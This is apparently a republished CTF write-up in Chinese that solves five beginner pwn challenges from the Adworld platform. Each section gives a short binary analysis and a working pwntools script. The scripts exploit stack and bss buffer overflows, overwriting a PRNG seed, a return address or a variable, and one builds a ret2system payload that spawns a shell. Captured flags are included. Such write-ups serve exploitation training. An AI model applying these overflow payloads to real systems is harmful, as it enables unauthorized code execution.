3

攻防世界-新手区-PWN部分-WriteUP

 2 years ago
source link: https://iamywang.github.io/2020/adworld-pwn-1/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

0x01 guess_num

checksec

栈可执行,有Canary、有PIE

ida分析

猜数字,连续猜对10个随机数得到flag。

输入字符串地址是rsp+10h,seed地址是rsp+30h
先将20h长度填充,然后覆盖随机数种子

payload构造

payload = ‘A’ * 0x20 + p64(1)
随机数种子为1
这样得到的结果是:2 5 4 2 6 2 5 1 4 2

python脚本

from pwn import *

p = remote('220.249.52.133', 36834)

payload = 'A' * 0x20 + p64(1)
p.sendlineafter('Your name:', payload)
p.sendlineafter('number:', '2')
p.sendlineafter('number:', '5')
p.sendlineafter('number:', '4')
p.sendlineafter('number:', '2')
p.sendlineafter('number:', '6')
p.sendlineafter('number:', '2')
p.sendlineafter('number:', '5')
p.sendlineafter('number:', '1')
p.sendlineafter('number:', '4')
p.sendlineafter('number:', '2')
p.interactive()
cyberpeace{cdece09e67aec66f2211ee4176f1f555}

0x02 int_overflow

checksec

栈可执行、无Canary、无PIE

有一个what_is_this函数,直接cat flag,地址是0x804868B
看看login函数,利用一下溢出
此外,dest的长度是0x14
让return返回到cat flag函数的那个地址

payload && flag

from pwn import *

p = remote('220.249.52.133', 37973)

payload = 'A' * 0x14 + 'A' * 0x4 + p32(0x804868B) + 'A' * (259 - 0x14 - 0x4 - 0x4)
p.sendlineafter('choice:', '1')
p.sendlineafter('username:', 'test')
p.sendlineafter('passwd:',payload)
p.interactive()

flag: cyberpeace{fe888549b805068ba1e6202e4e773ae9}

0x03 hello_pwn

No canary found NX enabled No PIE

ida分析

bss段的缓冲区溢出
unk_601068是4个字节、覆盖后面的dword_60106C

read(0, &unk_601068, 0x10uLL);
if ( dword_60106C == 1853186401 )
  sub_400686();
return 0LL;

payload

from pwn import *

p = remote('220.249.52.133', 39152)

payload = 'A' * 0x4 + p64(1853186401)
p.sendlineafter('bof',payload)
p.interactive()

cyberpeace{74d21a7fa6658cc0583194d86cc2a014}

0x04 when_did_you_born

from pwn import *

p = remote('220.249.52.133', 41239)

payload = 'A' * 0x8 + p64(1926)
p.sendlineafter('Your Birth?','1999')
p.sendlineafter('Your Name?',payload)
p.interactive()

cyberpeace{c3ca2fbd84f939f07a7d9b32caec7991}

0x05 cgpwn2

基本思想:把/bin/sh放在bss段,然后让返回地址覆盖为system,参数为name地址,这样执行sh。

from pwn import *

p = remote('220.249.52.133', 35902)

# name addr
name_addr = 0x0804A080

# system address
elf = ELF('../bin/cgpwn2')
system_addr = elf.symbols['system']
# system_addr = 0x08048420
# print hex(system_addr)

payload = 'A'*0x26 + 'A'*0x4 + p32(system_addr) + p32(0) + p32(name_addr)

p.sendlineafter('name','/bin/sh')
p.sendlineafter('here:', payload)
p.interactive()


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK